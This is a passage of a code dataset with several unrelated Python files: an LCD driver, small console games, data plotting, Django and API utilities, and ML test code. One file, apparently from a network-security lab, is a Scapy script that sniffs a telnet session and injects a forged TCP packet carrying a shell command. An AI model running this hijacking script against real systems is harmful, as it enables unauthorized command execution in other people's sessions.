matrix\n self.write_lcd(self.LCD_DATA_E1, 0x09) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E1, 0x20) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_RETURNHOME)\n self.write_lcd(self.LCD_DATA_E2, 0x33) # Init\n self.write_lcd(self.LCD_DATA_E2, 0x32) # Init\n self.write_lcd(self.LCD_DATA_E2, 0x24) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, 0x09) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, 0x20) # 2 line 5x8 matrix\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_RETURNHOME)\n\n\n def __str__(self):\n return \"lcd 6x20\"\n\n def __family__(self):\n return \"lcd\"\n\n # ----------------------------------------------------------------------\n # Write operations\n\n # Low-level 4-bit interface for LCD output. This doesn't actually\n # write data, just returns a byte array of the PORTB state over time.\n # Can concatenate the output of multiple calls (up to 8) for more\n # efficient batch write.\n def out4(self, chip_cs, bitmask, value):\n hi = bitmask | ((value >> 4)<<3)\n lo = bitmask | ((value & 0x0F)<<3)\n return [(hi | chip_cs), hi, (lo | chip_cs), lo]\n\n\n # The speed of LCD accesses is inherently limited by I2C through the\n # port expander. A 'well behaved program' is expected to poll the\n # LCD to know that a prior instruction completed. But the timing of\n # most instructions is a known uniform 37 mS. The enable strobe\n # can't even be twiddled that fast through I2C, so it's a safe bet\n # with these instructions to not waste time polling (which requires\n # several I2C transfers for reconfiguring the port direction).\n # The D7 pin is set as input when a potentially time-consuming\n # instruction has been issued (e.g. screen clear), as well as on\n # startup, and polling will then occur before more commands or data\n # are issued.\n\n pollables = ( LCD_CLEARDISPLAY, LCD_RETURNHOME )\n\n # Write byte, list or string value to LCD\n def write_lcd(self, chip_cs, value, char_mode=False):\n \"\"\" Send command/data to LCD \"\"\"\n bitmask = self.led;\n if char_mode:\n bitmask |= self.LCD_DATA_RS # Set data bit if not a command\n self.writeRegister( self.MCP23008_IOCON, 0x20 )\n # If string or list, iterate through multiple write ops\n if isinstance(value, str):\n last = len(value) - 1 # Last character in string\n if last>self.cols:\n last = self.cols\n data = [] # Start with blank list\n for i, v in enumerate(value): # For each character...\n # Append 4 bytes to list representing PORTB over time.\n # First the high 4 data bits with strobe (enable) set\n # and unset, then same with low 4 data bits (strobe 1/0).\n data.extend(self.out4(chip_cs, bitmask, ord(v)))\n # I2C block data write is limited to 32 bytes max.\n # If limit reached, write data so far and clear.\n # Also do this on last byte if not otherwise handled.\n if (len(data) >= 32) or (i == last):\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = [] # Clear list for next iteration\n elif isinstance(value, list):\n # Same as above, but for list instead of string\n last = len(value) - 1\n data = []\n for i, v in enumerate(value):\n data.extend(self.out4(chip_cs, bitmask, v))\n if (len(data) >= 32) or (i == last):\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = []\n else:\n # Single byte\n data = self.out4(chip_cs, bitmask, value)\n self.writeRegisters( self.MCP23008_GPIO, data)\n data = []\n self.writeRegister( self.MCP23008_IOCON, 0 )\n # If a poll-worthy instruction was issued, reconfigure D7\n # pin as input to indicate need for polling on next call.\n if (not char_mode) and (value in self.pollables):\n sleep(0.015)\n\n\n # ----------------------------------------------------------------------\n # Utility methods\n\n def begin(self, cols, lines):\n self.currline = 0\n self.cols = cols\n self.numlines = lines\n self.clear()\n\n\n # Puts the MCP23008 back in Bank 0 + sequential write mode so\n # that other code using the 'classic' library can still work.\n # Any code using this newer version of the library should\n # consider adding an atexit() handler that calls this.\n def stop(self):\n self.porta = 0b10000000 # Turn off LEDs on the way out\n sleep(0.0015)\n self.writeRegister( self.MCP23008_IOCON, 0 )\n self.writeRegisters(\n 0,\n [ 0b00000000, # IODIR\n 0b00000000, # IPOL\n 0b00000000, # GPINTEN\n 0b00000000, # DEFVAL\n 0b00000000, # INTCON\n 0b00000000, # IOCON\n 0b00000000, # GPPU\n 0b00000000, # INTF\n 0b00000000, # INTCAP\n self.porta, # GPIO\n self.porta ]) # OLAT\n\n\n def clear(self):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CLEARDISPLAY)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CLEARDISPLAY)\n\n\n def home(self):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_RETURNHOME)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_RETURNHOME)\n\n\n row_offsets = ( KS0073_LINE1_START, KS0073_LINE2_START, KS0073_LINE3_START, KS0073_LINE4_START, KS0073_LINE5_START, KS0073_LINE6_START )\n row_chip_select = ( LCD_DATA_E1, LCD_DATA_E1, LCD_DATA_E1, LCD_DATA_E2, LCD_DATA_E2, LCD_DATA_E2 )\n def setCursor(self, col, line_nr):\n if line_nr > self.numlines:\n line_nr = self.numlines - 1\n elif line_nr < 0:\n line_nr = 0\n self.write_lcd(self.row_chip_select[line_nr], self.LCD_SETDDRAMADDR | (col+self.row_offsets[line_nr]) )\n\n\n def display(self):\n \"\"\" Turn the display on (quickly) \"\"\"\n self.displaycontrol |= self.LCD_DISPLAYON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noDisplay(self):\n \"\"\" Turn the display off (quickly) \"\"\"\n self.displaycontrol &= ~self.LCD_DISPLAYON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def cursor(self):\n \"\"\" Underline cursor on \"\"\"\n self.displaycontrol |= self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noCursor(self):\n \"\"\" Underline cursor off \"\"\"\n self.displaycontrol &= ~self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def ToggleCursor(self):\n \"\"\" Toggles the underline cursor On/Off \"\"\"\n self.displaycontrol ^= self.LCD_CURSORON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def blink(self):\n \"\"\" Turn on the blinking cursor \"\"\"\n self.displaycontrol |= self.LCD_BLINKON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def noBlink(self):\n \"\"\" Turn off the blinking cursor \"\"\"\n self.displaycontrol &= ~self.LCD_BLINKON\n self.write_lcd(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def ToggleBlink(self):\n \"\"\" Toggles the blinking cursor \"\"\"\n self.displaycontrol ^= self.LCD_BLINKON\n self.write(self.LCD_DATA_E1, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n self.write(self.LCD_DATA_E2, self.LCD_DISPLAYCONTROL | self.displaycontrol)\n\n\n def scrollDisplayLeft(self):\n \"\"\" These commands scroll the display without changing the RAM \"\"\"\n self.displayshift = self.LCD_DISPLAYMOVE | self.LCD_MOVELEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n\n\n def scrollDisplayRight(self):\n \"\"\" These commands scroll the display without changing the RAM \"\"\"\n self.displayshift = self.LCD_DISPLAYMOVE | self.LCD_MOVERIGHT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_CURSORSHIFT | self.displayshift)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_CURSORSHIFT | self.displayshift)\n\n\n def leftToRight(self):\n \"\"\" This is for text that flows left to right \"\"\"\n self.displaymode |= self.LCD_ENTRYLEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def rightToLeft(self):\n \"\"\" This is for text that flows right to left \"\"\"\n self.displaymode &= ~self.LCD_ENTRYLEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def autoscroll(self):\n \"\"\" This will 'right justify' text from the cursor \"\"\"\n self.displaymode |= self.LCD_ENTRYSHIFTINCREMENT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def noAutoscroll(self):\n \"\"\" This will 'left justify' text from the cursor \"\"\"\n self.displaymode &= ~self.LCD_ENTRYSHIFTINCREMENT\n self.write_lcd(LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def createChar(self, location, bitmap):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_SETCGRAMADDR | ((location & 7) << 3))\n self.write_lcd(self.LCD_DATA_E1, bitmap, True)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_SETDDRAMADDR)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_SETCGRAMADDR | ((location & 7) << 3))\n self.write_lcd(self.LCD_DATA_E2, bitmap, True)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_SETDDRAMADDR)\n\n\n def message(self, text):\n \"\"\" Send string to LCD. Newline wraps to second line\"\"\"\n lines = str(text).split('\\n') # Split at newline(s)\n for i, line in enumerate(lines): # For each substring...\n if i > 0: # If newline(s),\n self.write_lcd(self.LCD_DATA_E1, 0xC0) # set DDRAM address to 2nd line\n self.write_lcd(self.LCD_DATA_E1, line, True) # Issue substring\n\n\n def message_line(self, line_nr, text):\n self.setCursor(0, line_nr)\n self.write_lcd(self.row_chip_select[line_nr], text, True)\n\n\n def message_line_pos(self, line_nr, pos, text):\n self.setCursor(pos, line_nr)\n self.write_lcd(self.row_chip_select[line_nr], text, True)\n\n\n def backlight(self, onoff):\n self.led = onoff\n self.writeRegister( self.MCP23008_GPIO, self.led )\n\n","sub_path":"python/webiopi/devices/lcd/lcd6x20.py","file_name":"lcd6x20.py","file_ext":"py","file_size_in_byte":16348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"90201781","text":"'''\nTemp_convertor.py\nCreated by Teddy Putus 16/10/2012\nModified by Teddy Putus 17/10/2012\n - Added reset\n - Added Error checking for type input/output\n'''\n\n#Allows for restart\nrestart=int('1')\nwhile restart==1:\n\n#Find input type\n print(\"Welcome to the celsius-farenheit-kelvin convertor\")\n select=input('Please select input type\\n 1-Celsius\\n 2-Farenheit\\n 3-Kelvin\\n')\n\n#Check they have entered a correct choice\n while select!= str('1') and select!=str('2') and select!=str('3'):\n select=input('That is not a valid choice, please enter a digit between 1 and 3\\n')\n\n#Find output type\n select2=input('Please select output type\\n 1-Celsius\\n 2-Farenheit\\n 3-Kelvin\\n')\n\n#Check they have entered a correct choice\n while select2!= str('1') and select2!=str('2') and select2!=str('3'):\n select2=input('That is not a valid choice, please enter a digit between 1 and 3\\n')\n\n#Convert to integers and see if there's a point to the calculation\n sel_in=int(select)\n sel_in_2=int(select2)\n while sel_in==sel_in_2:\n select=input('That value does not need converting, please select another input type\\n 1-Celsius\\n 2-Farenheit\\n 3-Kelvin\\n')\n select2=input('Please select another output type\\n 1-Celsius\\n 2-Farenheit\\n 3-Kelvin\\n')\n\n#Convert as appropriate\n if sel_in==1:\n temp=input('Enter your temperature in celsius: ')\n temp_int=float(temp)\n if sel_in_2==2:\n result=(temp_int*1.8)+32\n print(temp_int,'celsius is', result, 'farenheit')\n else:\n if sel_in_2==3:\n result=temp_int+273.15\n print(temp_int, 'celsius is', result, 'kelvin')\n\n if sel_in==2:\n temp=input('Enter your temperature in farenheit: ')\n temp_int=float(temp)\n if sel_in_2==1:\n result=(temp_int-32)/1.8\n print(temp_int,'farenheit is', result, 'celsius')\n else:\n if sel_in_2==3:\n result=((temp_int-32)/1.8)+273.15\n print(temp_int, 'farenheit is', result, 'kelvin')\n\n if sel_in==3:\n temp=input('Enter your temperature in kelvin: ')\n temp_int=float(temp)\n if sel_in_2==1:\n result=temp_int-273.15\n print(temp_int,'kelvin is', result, 'celsius')\n else:\n if sel_in_2==2:\n result=((temp_int-273.15)*1.8)+32\n print(temp_int, 'kelvin is', result, 'farenheit')\n#Restart choice\n restart_choice=input('Would you like to convert again? y/n')\n if restart_choice==str('y') or restart_choice==str('Y'):\n restart=int('1')\n else:\n if restart_choice==str('n') or restart_choice==str('N'):\n restart=int('0')\n else:\n while restart_choice!=str('y') and restart_choice!=str('Y') and restart_choice!=str('n') and restart_choice!=str('N'):\n restart_choice=input(\"That wasn't a valid choice, please select y/n\")\n","sub_path":"python/temp_convertor_reset.py","file_name":"temp_convertor_reset.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"249799976","text":"pyg = 'ay'\nvar = 1\n\nwhile var == 1:\n original = input('Enter a word: ')\n if len(original) > 0 and original.isalpha():\n word = original.lower()\n first = word[0]\n new_word = word [1:len(word)] + first + pyg\n print (new_word)\n try_again = input('Would you like to go again? Y?N ')\n if try_again is 'N':\n var = 2\n print ('Goodbye!')\n elif len(original) == 0:\n print ('You have not entered a word! ')\n elif len(original) > 0 and original.isdigit():\n print ('Real words are not numbers! Try again. ')\n elif original.isalpha() and original.isdigit():\n print ('Please type words, not passwords. No numbers! ')\n else:\n print ('Try again! ')\n","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"295501312","text":"#!/usr/bin/python3\nfrom scapy.all import *\n\nSRC = \"172.17.0.4\"\nDST = \"172.17.0.3\"\nPORT = 23\n\ndef spoof(pkt):\n old_ip = pkt[IP]\n old_tcp = pkt[TCP]\n\n #############################################\n ip = IP( src = old_ip.src,\n dst = old_ip.dst\n )\n tcp = TCP( sport = old_tcp.sport,\n dport = old_tcp.dport,\n seq = old_tcp.seq+1,\n ack = old_tcp.ack+1,\n flags = \"A\"\n )\n data = \"\\n ls \\n\"\n #############################################\n\n pkt = ip/tcp/data\n send(pkt,verbose=0)\n ls(pkt)\n quit()\n\nf = 'tcp and src host {} and dst host {} and dst port {}'.format(SRC, DST, PORT)\nsniff(filter=f, prn=spoof)\n\n","sub_path":"VPN实验补充/scapyCode/hijacking_auto.py","file_name":"hijacking_auto.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"393152771","text":"import os\nfrom pathlib import Path\nimport numpy as np\nimport mne\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\ndirname = \"edf_png/\"\ntime_window = 1\n\n\n# グラフを描写する際に使うカラーコード\ncolor_list = []\nfor cname in matplotlib.colors.cnames.values():\n color_list.append(cname)\n\n# 画像ファイルを作成するフォルダをカレントディレクトリに作成\nos.makedirs(dirname, exist_ok = True)\n\n# edfdataフォルダ内のedfファイルを読み込み\nedf_dir = Path(\"/Users/keisuke/b3_task/edfdata\")\nedf = mne.io.read_raw_edf(next(edf_dir.glob(\"*.edf\")),\n preload = True)\nedf.drop_channels('PHOTIC PH')\nsfreq = float(edf.info[\"sfreq\"])\nntimes = float(edf.n_times)\n\n#画像作成\ndef export():\n data = edf.get_data()\n for count in range(int(ntimes/(sfreq * time_window))):\n # for count in range(10):\n # data = edf.get_data(start = int(edf.time_as_index(count)),\n # stop = int(edf.time_as_index(count + 1)))\n for i, ch in enumerate(edf.ch_names):\n plt.plot(data[i, count * time_window * 250 : (count + 1) * time_window * 250],\n label = ch, color = color_list[i])\n\n plt.savefig(dirname + \"file_{0}.png\".format(count + 1))\n plt.close()\n\nexport()\n","sub_path":"edf_to_png.py","file_name":"edf_to_png.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"465544498","text":"from django.shortcuts import render\nimport requests\nimport json\nfrom django.http import JsonResponse\n\n# Create your views here.\ndef editor(request):\n data={}\n\n return render(request, 'pages/editor.html',data)\n\n\ndef postCode(request):\n url = 'https://tpcg.tutorialspoint.com/tpcg.php'\n cod = request.POST.get('contentA')\n print('code----------' ,cod)\n\n \n \n \n data = {\n 'lang': 'python',\n 'device': '',\n 'code': cod,\n 'stdinput': '',\n 'ext': 'py',\n 'compile': '0',\n 'execute': 'python main.py',\n 'mainfile': 'main.py',\n 'uid': '5116890',\n }\n req = requests.post(url, data = data)\n resultat = req.text\n print(resultat)\n # print(req.status_code)\n # print(req.text)\n datas = {\n 'succes':True,\n 'resultat': resultat\n }\n return JsonResponse(datas, safe=False)\n#django-admin-interface","sub_path":"projetvideo/editor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"391065250","text":"import os\n\n\nPROGRAM_NAME = 'qua'\n\nAPP_NAME = PROGRAM_NAME\n\nVAR = '/var'\n\nVAR_LIB = os.path.join(VAR, 'lib')\n\nVAR_LOG = os.path.join(VAR, 'log')\n\nLOGS_DIR = os.path.join(VAR_LOG, PROGRAM_NAME)\n\nDATA_DIR = os.path.join(VAR_LIB, PROGRAM_NAME, 'data')\n\nELASTICSEARCH = {\n 'hosts': ['esserver'],\n 'timeout': 30,\n 'max_retries': 10,\n 'retry_on_timeout': True\n}\n\nREDIS = {\n 'host': 'redisserver',\n 'port': 6379,\n 'db_cache': 0,\n 'db_persistent': 1\n}\n\nPOSTGRESQL = {\n 'host': 'postgresserver',\n 'port': '5432',\n 'user': 'quauser',\n 'password': 'somestrongdbpassword',\n 'engine': 'django.db.backends.postgresql_psycopg2'\n}\n\nMAX_SEARCH_RESULTS = 100\n\nSERP_SIZE = 10\n\nES_DOCTYPE = 'main'\n\nES_SEARCH_INDEX = PROGRAM_NAME + '_search'\n\nES_SPELLING_INDEX = PROGRAM_NAME + '_spelling'\n\nSEARCH_FIELDS = ['title^4', 'keywords^2', 'text']\n","sub_path":"common/qua/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"280909","text":"import json\nfrom typing import List\n\nfrom apistar import App, Route, types, validators\nfrom apistar.http import JSONResponse\n\n\ndef _load_application_data():\n with open('MOCK_DATA.json') as f:\n applications = json.loads(f.read())\n return {application[\"id\"]: application for application in applications}\n\n\napplications = _load_application_data()\n\nVALID_COMPANIES = set([application[\"company_name\"] for application in applications.values()])\nAPP_NOT_FOUND = 'Application not found'\n\n\nclass Application(types.Type):\n id = validators.Integer(allow_null=True) # assign in POST\n app_name = validators.String(max_length=100)\n app_version = validators.String(max_length=100)\n logo = validators.String(max_length=100)\n company_name = validators.String(enum=list(VALID_COMPANIES))\n\n\ndef list_applications() -> List[Application]:\n return [Application(application[1]) for application in sorted(applications.items())]\n\n\ndef create_application(application: Application) -> JSONResponse:\n application_id = len(applications) + 1\n application.id = application_id\n applications[application_id] = application\n return JSONResponse(Application(application), status_code=201)\n\n\ndef get_application(application_id: int) -> JSONResponse:\n application = applications.get(application_id)\n\n if not application:\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n return JSONResponse(Application(application), status_code=200)\n\n\ndef update_application(application_id: int, application: Application) -> JSONResponse:\n if not applications.get(application_id):\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n application.id = application_id\n applications[application_id] = application\n return JSONResponse(Application(application), status_code=200)\n\n\ndef delete_application(application_id: int) -> JSONResponse:\n if not applications.get(application_id):\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n del applications[application_id]\n return JSONResponse({}, status_code=204)\n\n\nroutes = [\n Route('/', method='GET', handler=list_applications),\n Route('/', method='POST', handler=create_application),\n Route('/{application_id}/', method='GET', handler=get_application),\n Route('/{application_id}/', method='PUT', handler=update_application),\n Route('/{application_id}/', method='DELETE', handler=delete_application),\n]\n\napp = App(routes=routes)\n\nif __name__ == '__main__':\n app.serve('127.0.0.1', 5000, debug=True)\n","sub_path":"days/009-012-modern-apis-starred/your-turn/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"449371092","text":"#!/usr/bin/python\n################################################################################\n# HTTPS INTERFACE\n#\n# Justin Dierking\n# justin.l.dierking.civ@mail.mil\n# (614) 692 2050\n#\n# 07/27/2017 Original construction\n################################################################################\n\nSESSION_TIMEOUT = 90\n\nimport json\nimport traceback\nimport ssl\nimport hashlib\nimport httplib\nimport urllib2\n\nfrom threading import Lock, Thread, Timer\nfrom time import time, sleep\nfrom ..controller.messaging import add_message\n\nglobal https_sessions\nhttps_sessions = {}\n\ndef create_session(url):\n trys = 0\n \n while trys < 3:\n try:\n trys += 1\n \n req = urllib2.Request(url = url)\n \n https_sessions[url] = {}\n https_sessions[url][\"lock\"] = Lock()\n https_sessions[url][\"contact\"] = time()\n https_sessions[url][\"full url\"] = req.get_full_url() \n https_sessions[url][\"connection\"] = httplib.HTTPSConnection(req.get_host(), \\\n context = ssl._create_unverified_context(), \\\n timeout = 15)\n \n return True\n except Exception:\n add_message(traceback.format_exc())\n del https_sessions[url]\n sleep(1)\n \n raise Exception(str(traceback.format_exc()))\n\ndef destroy_session(url):\n try:\n https_sessions[url][\"connection\"].close()\n except Exception:\n add_message(traceback.format_exc())\n del https_sessions[url]\n\ndef send_json(url, json_in, secret_digest):\n if url not in https_sessions:\n create_session(url)\n\n raw_json_in = json.dumps(json_in)\n \n h = hashlib.sha256()\n h.update(secret_digest)\n h.update(raw_json_in)\n \n headers = {\n 'Content-Type' : 'application/json',\n 'Signature' : h.hexdigest()\n }\n \n trys = 0\n \n while trys < 3:\n try:\n trys += 1\n \n https_sessions[url][\"lock\"].acquire()\n https_sessions[url][\"contact\"] = time()\n https_sessions[url][\"connection\"].request(\"POST\", \\\n https_sessions[url][\"full url\"], \\\n raw_json_in, \\\n headers)\n response = https_sessions[url][\"connection\"].getresponse()\n signature = response.getheader(\"Signature\")\n raw_json_out = response.read()\n https_sessions[url][\"lock\"].release()\n \n h = hashlib.sha256()\n h.update(secret_digest)\n h.update(raw_json_out)\n \n if h.hexdigest() != signature:\n raise Exception(\"Signature mismatch encountered!\")\n \n return json.loads(raw_json_out)\n except Exception:\n add_message(traceback.format_exc())\n https_sessions[url][\"lock\"].release()\n destroy_session(url)\n sleep(1)\n \n raise Exception(str(traceback.format_exc()))\n \ndef worker():\n Timer(60.0, worker).start()\n\n try:\n stale_urls = []\n \n for k, v in https_sessions.iteritems():\n try:\n if time() - v[\"contact\"] > SESSION_TIMEOUT:\n stale_urls.append(k)\n except Exception:\n stale_urls.append(k)\n \n for url in stale_urls:\n destroy_session(url)\n\n except Exception:\n add_message(traceback.format_exc())\n \nThread(target = worker).start()","sub_path":"dev5/interface/httpsint.py","file_name":"httpsint.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"46288056","text":"# coding = utf-8\nimport requests\nimport json\n\ndef read():\n count = 0\n with open('D:\\\\desktop\\\\ccid.txt',encoding='utf-8') as open_file:\n for line in open_file:\n ## 拼装json数据\n data = {}\n data['prodCode'] ='QYL'\n data['userId'] = str(line.strip())\n data['overdueDegree'] = 'm1'\n data['isPayOff'] = '1'\n data['overdueDays'] = 1\n #print(json.dumps(data))\n count += 1\n print(count)\n ##访问http接口\n result = post(json.dumps(data))\n if 'SUCCESS' != result:\n print('出现异常。。。。。。'+str(line.strip()))\n break\n\n\ndef post(json_data):\n #url = \"http://106.15.201.163:81/risk-auditing-service/risk/overdue/dealOverdue\"\n url = \"http://proxy.namifunds.com:8105/risk-auditing-service/risk/overdue/dealOverdue\"\n \n headers = {'content-type': 'application/json'}\n r = requests.post(url,data=json_data,headers=headers)\n return r.text\n\n\n\nif __name__ == '__main__':\n #main()\n read()","sub_path":"http/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372895852","text":"import json, re, os\n\ndef save_json(json_dict, output_file):\n \"\"\"\n Funcion que exporta el contenido de un bloque json en un archivo\n \"\"\"\n if not os.path.exists('data'):\n os.makedirs('data')\n \n with open(output_file, 'w') as file:\n json.dump(json_dict, file)\n\n\ndef clean_emojis(tweet):\n \"\"\"\n La solucion para eliminar los emojis ha sido obtenida a partir de este\n hilo de StackOverFlow : https://stackoverflow.com/a/33417311/3356476\n :param tweet:\n :return:\n \"\"\"\n # Patron para reconocer y eliminar emojis\n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\"\n u\"\\U0001F300-\\U0001F5FF\"\n u\"\\U0001F680-\\U0001F6FF\"\n u\"\\U0001F1E0-\\U0001F1FF\"\n \"]+\", flags=re.UNICODE)\n\n return emoji_pattern.sub(r'', tweet)\n\n\ndef formato_tweet(in_tweet):\n \"\"\"\n Extraemos info necesario\n \"\"\"\n\n # Crear diccionario\n tweet = dict()\n\n # Obtener informacion del usuario\n tweet['usuario'] = in_tweet['user']['screen_name']\n tweet['localizacion'] = in_tweet['user']['location']\n tweet['seguidores'] = in_tweet['user']['followers_count']\n\n # Obtener texto del tweet y eliminar emojis\n t_date = in_tweet['created_at']\n tweet['creado'] = t_date\n tweet_text = in_tweet['text']\n clean_tweet = clean_emojis(tweet_text)\n tweet['texto'] = clean_tweet\n tweet['fuentes'] = in_tweet['source']\n tweet['contador_caracteres'] = len(clean_tweet)\n tweet['contador_palabras'] = len(clean_tweet.split())\n\n # Devolver tweet limpio\n return tweet\n","sub_path":"librerias/utiles.py","file_name":"utiles.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"299320561","text":"# !/usr/bin/python3\n# coding:utf-8 \n# Author : mahua\n# Email : lihh3721@gmail.com\n# Time : 2019/4/20 9:15 AM\n# FileName : config.py\nfrom configparser import ConfigParser\nfrom API_prac.common import contants\n\n\nclass ReadConfig:\n\n def __init__(self,encoding=\"utf-8\"):\n #打开配置文件\n self.cf = ConfigParser()\n self.cf.read(contants.global_file,encoding)#加载global文件\n switch = self.cf.getboolean('switch','on')\n if switch:#如果switch打开,则读取预生产环境pre;否则读取test\n self.cf.read(contants.pre_file,encoding)\n else:\n self.cf.read(contants.test_file,encoding)\n\n def get_strValue(self,section,option):\n return self.cf.get(section,option)\n\nconfig = ReadConfig()\n\n# if __name__ == '__main__':\n# config = ReadConfig()\n","sub_path":"API_prac/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"141075800","text":"# Final Project Testing code.\n\n# import some common libraries\nfrom skimage.morphology import label\nfrom scipy import ndimage\nimport pandas as pd\nimport random\nimport os\n\n# import some common detectron2 utilities\nfrom detectron2.data.datasets import register_coco_instances\nfrom detectron2.utils.visualizer import ColorMode\n\n# loading model, weights, dataset\nregister_coco_instances(\"test\", {}, \"./final_dataset/coco/test.json\", \"./final_dataset/coco/test_images\")\nnucleus_metadata = MetadataCatalog.get(\"nucleus\")\ndataset_dicts = DatasetCatalog.get(\"test\")\ncfg.MODEL.WEIGHTS = os.path.join(\"./output\", \"model_0014999.pth\")\n\n# set the testing threshold for this model\ncfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\ncfg.DATASETS.TEST = (\"test\", )\npredictor = DefaultPredictor(cfg)\n\n# mask to RLE-code function\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b>prev+1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n A = run_lengths\n return run_lengths\n\n# Testing\n# 